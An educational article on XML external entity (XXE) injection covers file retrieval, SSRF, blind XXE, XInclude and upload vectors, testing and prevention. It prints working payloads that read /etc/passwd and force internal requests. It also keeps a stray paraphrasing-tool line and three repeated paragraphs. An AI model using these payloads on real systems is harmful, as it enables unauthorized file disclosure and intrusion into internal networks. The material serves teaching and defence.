XML external entity (XXE) injection

Context

XML External Entity Injection (XXE) is a web security vulnerability that enables an attacker to manipulate the processing of XML data by an application, often allowing access to files on the application server's file system and interaction with any external system or backend that the application can reach. In some instances, an attacker can exploit an XXE vulnerability to execute Server-Side Request Forgery (SSRF) attacks and compromise underlying servers or core infrastructure.

Certain applications employ the XML format for exchanging data between the server and browser, using standard libraries or platform APIs to process the XML data on the server. XXE vulnerabilities arise due to potentially hazardous features in the XML specification, which are supported by standard parsers even if the application does not normally use them.

XML external entities are a custom XML entity category that loads defined values from outside the DTD in which they are declared. External entities are of particular interest from a security perspective as they allow an entity to be established based on a file path or URL contents.

There are different kinds of XXE attacks, including exploiting XXE to retrieve files, where an external entity containing the file contents is defined and returned in the application response. Similarly, exploiting XXE to execute SSRF attacks involves defining an external entity based on a URL to a backend system. Blind XXE can be exploited for out-of-band data exfiltration, whereby sensitive data is transmitted from the application server to an attacker-controlled system. Finally, blind XXE can be leveraged to retrieve data via error messages by triggering a parsing error message containing confidential data.

Exploiting XXE to retrieve files

To conduct an XXE injection attack that obtains an arbitrary file from the server's file system, two modifications are required to the submitted XML:

Insert (or modify) a DOCTYPE element specifying an external entity that includes the file path. Modify a data value in the XML returned in the application's response to use the defined external entity. For instance, let us assume that an e-commerce application verifies a product's inventory status by forwarding the following XML code to the server:

 <?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>08</productId></stockCheck>

As the application lacks any specific defenses against XXE attacks, it is possible to exploit the XXE vulnerability to retrieve the file /etc/passwd by submitting the following XXE payload:

 <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

The given XXE payload creates an external entity, &xxe;, with the contents of the file /etc/passwd as its value and uses the entity in the productId value. Consequently, the response from the application contains the contents of the file:

 Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

Exploiting XXE to perform SSRF attacks

Aside from the retrieval of confidential data, XXE attacks can also lead to Server-Side Request Forgery (SSRF) attacks. This vulnerability can be severe, allowing the server-side application to transmit HTTP requests to any URL accessible to the server. To perform an SSRF attack by exploiting an XXE vulnerability, an external XML entity must be defined using the target URL, and the entity must be used in a data value. If the defined entity can be used in a data value returned in the application response, the response from the URL can be viewed in the application response, providing bidirectional interaction with the primary system. Otherwise, only blind SSRF attacks can be executed, which can still have critical ramifications.

In the forthcoming XXE example, the external entity will coerce the server to transmit an HTTP request to an internal system within the organization's infrastructure:

 <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.website.com/"> ]>

Blind XXE vulnerabilities

Numerous XXE vulnerabilities are "blind," implying that the application does not disclose the values of the external entities defined in its responses, making direct server-side file retrieval unfeasible.

Despite this, blind XXE vulnerabilities can still be identified and exploited, but more sophisticated techniques are necessary. Out-of-band techniques can occasionally be employed to uncover and exploit vulnerabilities to extract data. Moreover, XML parsing errors can sometimes be triggered, which result in the exposure of sensitive data in error messages.

Finding a hidden attack surface for XXE injection

The attack surface of XXE injection vulnerabilities is often apparent because the routine HTTP traffic of the application includes requests containing data in XML format. However, in some instances, the attack surface is less conspicuous. Nevertheless, with the correct approach, an XXE attack surface can be located in requests that do not contain any XML.

XInclude attacks

Certain applications accept data from clients, integrate it server-side into an XML document, and then parse the document. For example, this occurs when client-submitted data is included in a backend SOAP request that the backend SOAP service then processes.

In such cases, traditional XXE attacks are not feasible since you do not have complete control over the XML document, and consequently cannot define or modify a DOCTYPE element. However, you may be able to use XInclude instead. XInclude is a component of the XML specification that enables the construction of an XML document from sub-documents. As XInclude attacks can be placed in any data value in an XML document, the attack can be executed in circumstances where you only control a single data element placed in a server-side XML document.

 <foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

XXE attacks via file upload

Some applications permit file uploads that are then handled server-side. Various file formats, including XML-based ones, are used by these files. Among the XML-based file formats are office document formats like DOCX, as well as image formats like SVG.

Consider an example in which an application allows users to upload images and then performs processing or validation on the server after upload. Even if the application anticipates receiving an image format such as PNG or JPEG, the image processing library it uses may also support SVG images. As the SVG format is XML-based, an attacker can upload a malicious SVG image and access a hidden attack surface for XXE vulnerabilities.

XXE attacks via modified content type

It is common for most POST requests to use a default content type, which is usually generated by HTML forms and is known as application/x-www-form-urlencoded. However, some websites may still receive requests in other content types, including XML, which they may tolerate even if it is not the expected format.

 POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar

Then, it is possible that you can send the following request and achieve the same result:

 POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

If an application parses the message body content as XML and accepts requests containing XML in the message body, the XXE attack surface may be hidden. However, attackers can reach this surface by modifying the request format to use XML.

How to find and test for XXE vulnerabilities

Here are some possible ways to rephrase the sentence while keeping a similar number of lines:

To detect XXE vulnerabilities, you can try different techniques such as using external entities to retrieve a file from the server, defining an external entity based on a URL to monitor interactions, or attempting an XInclude attack to retrieve a file by including non-XML data in a server-side XML document.
To test for XXE vulnerabilities, you can check if the application is vulnerable to file retrieval by defining an external entity and using it in the application response. You can also test for blind XXE vulnerabilities by defining an external entity based on a URL and monitoring the system's interactions. Lastly, you can use an XInclude attack to test if non-XML data inclusion in a server-side XML document is vulnerable to retrieve files.
One way to test for XXE vulnerabilities is to try to retrieve a file from the server by defining an external entity based on a well-known operating system file and using that entity in the application response. Another way is to test for blind XXE vulnerabilities by defining an external entity based on a URL to monitor interactions with the system. Lastly, you can check for vulnerabilities related to non-XML user-supplied data inclusion in a server-side XML document using an XInclude attack to retrieve an operating system file.

How to prevent XXE vulnerabilities

XXE vulnerabilities occur because an application's XML parsing library supports potentially harmful XML features that the application does not require or intend to use. Disabling these features is the most straightforward and efficient way to prevent XXE attacks. Disabling external entity resolution and XInclude support is usually sufficient and can be accomplished through configuration options or programmatic overrides of default behavior. Check the documentation of your XML parsing library or API for guidance on disabling unnecessary features.